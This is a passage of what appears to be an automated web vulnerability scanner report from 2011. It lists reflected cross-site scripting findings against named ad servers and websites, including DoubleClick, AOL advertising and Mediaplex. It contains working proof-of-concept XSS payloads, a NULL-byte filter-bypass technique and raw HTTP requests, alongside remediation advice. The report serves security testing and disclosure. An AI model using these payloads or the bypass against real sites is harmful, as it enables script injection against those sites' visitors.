The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007a266"-alert(1)-"5b4df72a6fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a266"-alert(1)-"5b4df72a6fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5669
Date: Wed, 03 Aug 2011 13:13:10 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /click%3Bh%3Dv8/3b58/f/6f/%2a/n%3B244100576%3B0-0%3B0%3B67833030%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430384/115855006/direct/01%3fhref=&%007a266"-alert(1)-"5b4df72a6fb=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
...[SNIP]...
2.43. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.19
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676eb'-alert(1)-'004be3e51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.44. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.19
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a94c2"-alert(1)-"0cfdce15f52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb861'-alert(1)-'8ddfc3d33b8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95664"-alert(1)-"db0e79d9468 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.47. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.24
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd92d'-alert(1)-'0d4ae12be94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.48. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.24
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a014"-alert(1)-"2fe659fab9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7729"-alert(1)-"2987a5da095 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.50. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.50
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82770"-alert(1)-"08e18e3c776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6849
Date: Wed, 03 Aug 2011 12:38:25 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... net/click%3Bh%3Dv8/3b58/f/6c/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&82770"-alert(1)-"08e18e3c776=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D318%26migSource%3Dadsrv2%26migTrackDataExt%3D2986074%3B64699383%3B241902957%3B42386233%26migRandom%3D8182521%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B ...[SNIP]...
2.51. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.50
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001abfd'-alert(1)-'25a80048a19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1abfd'-alert(1)-'25a80048a19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e90f"-alert(1)-"03a907c1eb9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6681
Date: Wed, 03 Aug 2011 12:38:09 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=1e90f"-alert(1)-"03a907c1eb9http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64699383;241902957;42386233&migRandom=8166489&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.com ...[SNIP]...
2.53. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.57
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22967'-alert(1)-'2808f7e3313 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.54. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4892.160904.MMNUK/B5353379.57
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5546"-alert(1)-"e555e509462 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2d4"-alert(1)-"778cdb0a564 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21936'-alert(1)-'24eb2c9dc0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97050<script>alert(1)</script>4fedb100f0e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserver/vdi/71138497050<script>alert(1)</script>4fedb100f0e?d=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0&cb=0.13243940961547196 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/linkedin.dart/fjs_results;optout=false;lang=en;tile=2;sz=728x90;;extra%3Dnull;s=0;ord=691408033?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 02 Aug 2011 20:21:09 GMT
Server: XPEHb/1.0
Content-Length: 78
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f97f"-alert(1)-"44214e1d902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy5f97f"-alert(1)-"44214e1d902/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:26:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=3880879a759c2d9745d71e05c9372db7; expires=Tue, 30 Aug 2011 04:59:33 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:26:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4826"-alert(1)-"40d26245d6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcome4826"-alert(1)-"40d26245d6c/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:26:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=b5291c6f55dad402347af10e85d6ee7f; expires=Tue, 30 Aug 2011 05:00:14 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:26:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1485e"-alert(1)-"a67cc2ba52e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcom/opt-out1485e"-alert(1)-"a67cc2ba52e HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:27:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=e1d91ef2dae8a39fd0878dd64795bd2f; expires=Tue, 30 Aug 2011 05:00:47 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:27:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters="javascript:,advertising.a ...[SNIP]...
2.61. http://advertising.aol.com/privacy/advertisingcom/opt-out [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://advertising.aol.com
Path: /privacy/advertisingcom/opt-out
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a87d"-alert(1)-"2468124b9ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcom/opt-out?9a87d"-alert(1)-"2468124b9ba=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the mpt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc0c"><script>alert(1)</script>2db2f9db80f was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777c2"><script>alert(1)</script>7fa5842055d was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.64. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://altfarm.mediaplex.com
Path: /ad/fm/12741-112746-27909-3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc30"><script>alert(1)</script>8af36c94535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload fe2e6<img%20src%3da%20onerror%3dalert(1)>7810eff62ec was submitted in the q parameter. This input was echoed as fe2e6<img src=a onerror=alert(1)>7810eff62ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses an event handler to introduce arbitrary JavaScript into the document.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4aae1<script>alert(1)</script>e6c7a8db634 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 42c60<script>alert(1)</script>b11310a8a62 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b905<script>alert(1)</script>5e1517256ea was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9bd46<script>alert(1)</script>7f62247a19d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload df6ee<script>alert(1)</script>0abe55f4b8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 321b4<script>alert(1)</script>a6b4e81a8c6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c2d6"><script>alert(1)</script>a087e3155d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 288
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0b"><script>alert(1)</script>f0fbee0a376 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 288
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54be9"><script>alert(1)</script>d009f030070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 287
Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc04"><script>alert(1)</script>4748c177c84 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 279
Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c027"><script>alert(1)</script>7fbe6b87d67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972f8"><script>alert(1)</script>32dfd893ce6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef3"><script>alert(1)</script>1d437585e4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8090d"><script>alert(1)</script>483e44ae1ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298bd"><script>alert(1)</script>1e0c6d978bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7798<a>d4c0d4c265d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e ...[SNIP]... <em>blog.bolsademulher.com/favicon.icoc7798<a>d4c0d4c265d/</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ac0f<a>981d036f50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e ...[SNIP]... <em>blog.bolsademulher.com/movimentorosa8ac0f<a>981d036f50/</em> ...[SNIP]...
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a22da<script>alert(1)</script>cb5282e3245 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ request parameter is copied into the HTML document as plain text between tags. The payload 85aa3<script>alert(1)</script>530916da0b8 was submitted in the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.85. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://camarimmsn.com.br
Path: /wp-content/themes/msn-theme/sendMail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f863b<script>alert(1)</script>050e92f0818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into the XML document as plain text between tags. The payload a0ee5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29bac9477af was submitted in the cb parameter. This input was echoed as a0ee5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29bac9477af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
